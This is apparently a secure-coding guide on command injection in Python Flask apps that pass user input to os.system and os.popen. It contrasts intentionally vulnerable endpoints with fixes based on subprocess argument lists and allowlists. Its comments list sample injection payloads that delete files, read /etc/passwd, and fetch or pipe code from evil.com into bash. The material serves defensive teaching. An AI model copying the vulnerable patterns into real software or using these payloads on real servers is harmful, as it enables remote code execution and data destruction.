Command injection from user input in os.system/os.popen calls

Critical Risk command-injection
pythoncommand-injectionos-systemos-popenshellrce

What it is

A critical security vulnerability where user-controlled strings are passed to os.system/os.popen, invoking a shell where metacharacters enable arbitrary command execution. Command injection can execute arbitrary OS commands, read or modify data, and fully compromise the server.

import os
import sys
from flask import Flask, request, jsonify

app = Flask(__name__)

# VULNERABLE: Flask app with os.system injection
@app.route('/system-info')
def system_info():
    info_type = request.args.get('type', 'uptime')
    
    # VULNERABLE: User input in os.system
    if info_type == 'uptime':
        os.system('uptime')
    elif info_type == 'disk':
        path = request.args.get('path', '/')
        # DANGEROUS: Path parameter in command
        os.system(f'df -h {path}')
    elif info_type == 'process':
        pattern = request.args.get('pattern', '')
        # DANGEROUS: Search pattern in command
        os.system(f'ps aux | grep {pattern}')
    
    return 'System command executed'

@app.route('/file-ops')
def file_operations():
    operation = request.args.get('op', '')
    filename = request.args.get('file', '')
    
    if operation == 'view':
        # VULNERABLE: os.popen with user input
        with os.popen(f'cat {filename}') as proc:
            content = proc.read()
        return content
    
    elif operation == 'search':
        pattern = request.args.get('pattern', '')
        # DANGEROUS: Multiple user inputs
        with os.popen(f'grep "{pattern}" {filename}') as proc:
            results = proc.read()
        return results
    
    elif operation == 'backup':
        dest = request.args.get('dest', '/backup/')
        # VULNERABLE: Command construction
        command = f'cp {filename} {dest}'
        exit_code = os.system(command)
        return f'Backup completed with exit code: {exit_code}'
    
    return 'Invalid operation'

@app.route('/admin-tools')
def admin_tools():
    tool = request.args.get('tool', '')
    target = request.args.get('target', '')
    options = request.args.get('options', '')
    
    # VULNERABLE: Complete user control over command
    command = f'{tool} {options} {target}'
    
    try:
        result = os.popen(command).read()
        return jsonify({'result': result})
    except Exception as e:
        return jsonify({'error': str(e)})

if __name__ == '__main__':
    app.run(debug=True)

# Attack examples:
# GET /system-info?type=disk&path=/; rm -rf /var/www; echo
# GET /file-ops?op=view&file=/etc/passwd; wget evil.com/steal
# GET /file-ops?op=search&pattern=test" /etc/passwd; curl evil.com/data
# GET /admin-tools?tool=sh&options=-c&target="curl evil.com/backdoor | bash"
import subprocess
import hashlib
import os
from pathlib import Path
from typing import Dict, List, Any, Optional
from flask import Flask, request, jsonify
import logging

# Configure logging
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)

app = Flask(__name__)

class SecureSystemOperations:
    ALLOWED_OPERATIONS = {
        'system_info': {
            'uptime': {'command': ['uptime'], 'args': []},
            'disk_usage': {'command': ['df', '-h'], 'args': []},
            'memory': {'command': ['free', '-h'], 'args': []}
        },
        'file_ops': {
            'info': {'method': 'native'},
            'hash': {'method': 'native'},
            'count': {'method': 'subprocess', 'command': ['wc', '-l']}
        }
    }
    
    SAFE_DIRECTORIES = [
        Path('/secure/uploads').resolve(),
        Path('/secure/documents').resolve()
    ]
    
    def __init__(self):
        # Ensure safe directories exist
        for directory in self.SAFE_DIRECTORIES:
            directory.mkdir(parents=True, exist_ok=True)
    
    def get_system_info(self, info_type: str) -> Dict[str, Any]:
        if info_type not in self.ALLOWED_OPERATIONS['system_info']:
            raise ValueError(f'Info type not allowed: {info_type}')
        
        config = self.ALLOWED_OPERATIONS['system_info'][info_type]
        
        try:
            # SECURE: subprocess with fixed commands
            result = subprocess.run(
                config['command'],
                capture_output=True,
                text=True,
                timeout=10
            )
            
            return {
                'success': result.returncode == 0,
                'output': result.stdout,
                'error': result.stderr
            }
            
        except subprocess.TimeoutExpired:
            raise RuntimeError('Command timeout')
    
    def process_file(self, operation: str, filename: str) -> Dict[str, Any]:
        if operation not in self.ALLOWED_OPERATIONS['file_ops']:
            raise ValueError(f'File operation not allowed: {operation}')
        
        # Validate and resolve file path
        file_path = self._validate_file_path(filename)
        
        config = self.ALLOWED_OPERATIONS['file_ops'][operation]
        
        if config['method'] == 'native':
            return self._native_file_operation(operation, file_path)
        elif config['method'] == 'subprocess':
            return self._subprocess_file_operation(config['command'], file_path)
        else:
            raise ValueError('Unknown operation method')
    
    def _validate_file_path(self, filename: str) -> Path:
        import re
        
        # Basic validation
        if not re.match(r'^[a-zA-Z0-9._-]+$', filename):
            raise ValueError('Invalid filename format')
        
        if len(filename) > 255:
            raise ValueError('Filename too long')
        
        # Find file in safe directories
        for safe_dir in self.SAFE_DIRECTORIES:
            candidate_path = (safe_dir / filename).resolve()
            
            # Ensure path is within safe directory
            if str(candidate_path).startswith(str(safe_dir)):
                if candidate_path.exists() and candidate_path.is_file():
                    return candidate_path
        
        raise FileNotFoundError('File not found in safe directories')
    
    def _native_file_operation(self, operation: str, file_path: Path) -> Dict[str, Any]:
        if operation == 'info':
            stat = file_path.stat()
            return {
                'operation': 'info',
                'filename': file_path.name,
                'size': stat.st_size,
                'modified': stat.st_mtime,
                'permissions': oct(stat.st_mode)[-3:],
                'is_readable': os.access(file_path, os.R_OK)
            }
        
        elif operation == 'hash':
            hasher = hashlib.sha256()
            with open(file_path, 'rb') as f:
                for chunk in iter(lambda: f.read(4096), b''):
                    hasher.update(chunk)
            
            return {
                'operation': 'hash',
                'filename': file_path.name,
                'sha256': hasher.hexdigest(),
                'size': file_path.stat().st_size
            }
        
        else:
            raise ValueError(f'Unknown native operation: {operation}')
    
    def _subprocess_file_operation(self, command: List[str], 
                                  file_path: Path) -> Dict[str, Any]:
        full_command = command + [str(file_path)]
        
        try:
            # SECURE: subprocess with argument list
            result = subprocess.run(
                full_command,
                capture_output=True,
                text=True,
                timeout=30,
                cwd=str(file_path.parent)
            )
            
            return {
                'operation': 'subprocess',
                'command': ' '.join(command),
                'filename': file_path.name,
                'success': result.returncode == 0,
                'output': result.stdout.strip(),
                'error': result.stderr.strip()
            }
            
        except subprocess.TimeoutExpired:
            raise RuntimeError('Command execution timeout')

# Initialize secure operations
secure_ops = SecureSystemOperations()

# SECURE: Flask endpoints with validation
@app.route('/system-info')
def system_info():
    try:
        info_type = request.args.get('type', '').strip()
        
        if not info_type:
            return jsonify({'error': 'Info type required'}), 400
        
        result = secure_ops.get_system_info(info_type)
        return jsonify(result)
        
    except ValueError as e:
        return jsonify({'error': str(e)}), 400
    except Exception as e:
        logger.error(f'System info error: {e}')
        return jsonify({'error': 'Operation failed'}), 500

@app.route('/file-info/<filename>')
def file_info(filename):
    try:
        result = secure_ops.process_file('info', filename)
        return jsonify(result)
        
    except ValueError as e:
        return jsonify({'error': str(e)}), 400
    except FileNotFoundError as e:
        return jsonify({'error': str(e)}), 404
    except Exception as e:
        logger.error(f'File info error: {e}')
        return jsonify({'error': 'Operation failed'}), 500

@app.route('/file-hash/<filename>')
def file_hash(filename):
    try:
        result = secure_ops.process_file('hash', filename)
        return jsonify(result)
        
    except ValueError as e:
        return jsonify({'error': str(e)}), 400
    except FileNotFoundError as e:
        return jsonify({'error': str(e)}), 404
    except Exception as e:
        logger.error(f'File hash error: {e}')
        return jsonify({'error': 'Operation failed'}), 500

@app.route('/operations')
def list_operations():
    return jsonify({
        'system_info_types': list(secure_ops.ALLOWED_OPERATIONS['system_info'].keys()),
        'file_operations': list(secure_ops.ALLOWED_OPERATIONS['file_ops'].keys()),
        'safe_directories': [str(d) for d in secure_ops.SAFE_DIRECTORIES]
    })

@app.errorhandler(404)
def not_found(error):
    return jsonify({'error': 'Endpoint not found'}), 404

@app.errorhandler(500)
def internal_error(error):
    return jsonify({'error': 'Internal server error'}), 500

if __name__ == '__main__':
    app.run(host='127.0.0.1', port=5000, debug=False)

💡 Why This Fix Works

The vulnerable code uses os.system() and os.popen() with user input, allowing command injection through shell metacharacters. The secure version eliminates shell command usage, implements strict operation allowlisting, uses subprocess with argument lists, and leverages native Python operations for file handling.

Why it happens

Directly passing user input to os.system() enables shell command injection. The os.system() function executes commands through the system shell, interpreting metacharacters and allowing command chaining.

Root causes

User Input in os.system() Calls

Directly passing user input to os.system() enables shell command injection. The os.system() function executes commands through the system shell, interpreting metacharacters and allowing command chaining.

Preview example – PYTHON
import os
from flask import request

# VULNERABLE: User input in os.system()
@app.route('/execute')
def execute_command():
    cmd = request.args.get('cmd', '')
    
    # DANGEROUS: Direct shell execution
    exit_code = os.system(cmd)
    
    return f'Command executed with exit code: {exit_code}'

# Attack: GET /execute?cmd=cat /etc/passwd; wget evil.com/steal

String Formatting in os.popen()

Using string formatting or concatenation to build commands for os.popen() with user input. This allows attackers to inject additional commands or modify the intended command behavior.

Preview example – PYTHON
import os

# VULNERABLE: String formatting in os.popen()
def get_file_info(filename):
    # DANGEROUS: User input in formatted command
    command = f'ls -la {filename}'
    
    with os.popen(command) as proc:
        return proc.read()

# Attack: get_file_info('/etc/passwd; rm -rf /; echo')

Fixes

1

Replace os.system with subprocess

Use subprocess.run() with argument lists instead of os.system(). This avoids shell interpretation and prevents command injection attacks.

View implementation – PYTHON
import subprocess
from pathlib import Path

# SECURE: subprocess instead of os.system
def execute_safe_command(operation, filename):
    # Validate operation
    allowed_ops = {'count': ['wc', '-l'], 'info': ['file'], 'checksum': ['sha256sum']}
    if operation not in allowed_ops:
        raise ValueError('Operation not allowed')
    
    # Validate filename
    if not is_valid_filename(filename):
        raise ValueError('Invalid filename')
    
    # Build command safely
    command = allowed_ops[operation] + [filename]
    
    # SECURE: No shell interpretation
    result = subprocess.run(
        command,
        capture_output=True,
        text=True,
        timeout=30
    )
    
    if result.returncode != 0:
        raise RuntimeError(f'Command failed: {result.stderr}')
    
    return result.stdout

def is_valid_filename(filename):
    import re
    return (re.match(r'^[a-zA-Z0-9._-]+$', filename) and
            len(filename) <= 255 and
            '..' not in filename)
2

Use Native Python Alternatives

Replace shell commands with native Python functions whenever possible. Use pathlib, built-in file operations, and specialized libraries instead of external commands.

View implementation – PYTHON
import os
import hashlib
from pathlib import Path
from typing import Dict, Any

# SECURE: Native Python operations
class NativeFileOperations:
    def __init__(self, safe_directory: str):
        self.safe_dir = Path(safe_directory).resolve()
        
    def get_file_info(self, filename: str) -> Dict[str, Any]:
        file_path = self._validate_path(filename)
        stat = file_path.stat()
        
        return {
            'name': file_path.name,
            'size': stat.st_size,
            'modified': stat.st_mtime,
            'permissions': oct(stat.st_mode)[-3:],
            'is_file': file_path.is_file(),
            'is_readable': os.access(file_path, os.R_OK)
        }
    
    def calculate_checksum(self, filename: str) -> str:
        file_path = self._validate_path(filename)
        
        hasher = hashlib.sha256()
        with open(file_path, 'rb') as f:
            for chunk in iter(lambda: f.read(4096), b''):
                hasher.update(chunk)
        
        return hasher.hexdigest()
    
    def count_lines(self, filename: str) -> int:
        file_path = self._validate_path(filename)
        
        with open(file_path, 'r', encoding='utf-8') as f:
            return sum(1 for _ in f)
    
    def _validate_path(self, filename: str) -> Path:
        # Input validation
        if not filename or len(filename) > 255:
            raise ValueError('Invalid filename')
        
        # Resolve path safely
        file_path = (self.safe_dir / filename).resolve()
        
        # Ensure file is within safe directory
        if not str(file_path).startswith(str(self.safe_dir)):
            raise ValueError('Path outside safe directory')
        
        if not file_path.exists():
            raise FileNotFoundError(f'File not found: {filename}')
        
        return file_path
3

Implement Command Allowlisting

If system commands are necessary, create strict allowlists of permitted commands and use subprocess with proper validation and escaping.

View implementation – PYTHON
import subprocess
import shlex
from typing import List, Dict, Any

class SecureCommandRunner:
    ALLOWED_COMMANDS = {
        'list_files': {
            'command': ['ls', '-la'],
            'max_args': 1,
            'allowed_args': ['-h', '-t', '-r']
        },
        'file_type': {
            'command': ['file'],
            'max_args': 1,
            'allowed_args': []
        },
        'word_count': {
            'command': ['wc'],
            'max_args': 1,
            'allowed_args': ['-l', '-w', '-c']
        }
    }
    
    def execute_command(self, cmd_name: str, target: str, 
                       args: List[str] = None) -> Dict[str, Any]:
        # Validate command
        if cmd_name not in self.ALLOWED_COMMANDS:
            raise ValueError(f'Command not allowed: {cmd_name}')
        
        cmd_config = self.ALLOWED_COMMANDS[cmd_name]
        
        # Validate arguments
        validated_args = self._validate_args(args or [], cmd_config)
        
        # Validate target
        safe_target = self._validate_target(target)
        
        # Build command
        command = cmd_config['command'] + validated_args + [safe_target]
        
        # Execute safely
        try:
            result = subprocess.run(
                command,
                capture_output=True,
                text=True,
                timeout=30,
                cwd='/safe/workspace'
            )
            
            return {
                'success': result.returncode == 0,
                'output': result.stdout,
                'error': result.stderr,
                'command': ' '.join(command)
            }
            
        except subprocess.TimeoutExpired:
            raise RuntimeError('Command timeout')
    
    def _validate_args(self, args: List[str], config: Dict) -> List[str]:
        if len(args) > config['max_args']:
            raise ValueError('Too many arguments')
        
        allowed_args = config['allowed_args']
        for arg in args:
            if arg not in allowed_args:
                raise ValueError(f'Argument not allowed: {arg}')
        
        return args
    
    def _validate_target(self, target: str) -> str:
        import re
        
        # Basic validation
        if not re.match(r'^[a-zA-Z0-9._/-]+$', target):
            raise ValueError('Invalid target format')
        
        if '..' in target:
            raise ValueError('Directory traversal not allowed')
        
        return target

Detect This Vulnerability in Your Code

Sourcery automatically identifies command injection from user input in os.system/os.popen calls and many other security issues in your codebase.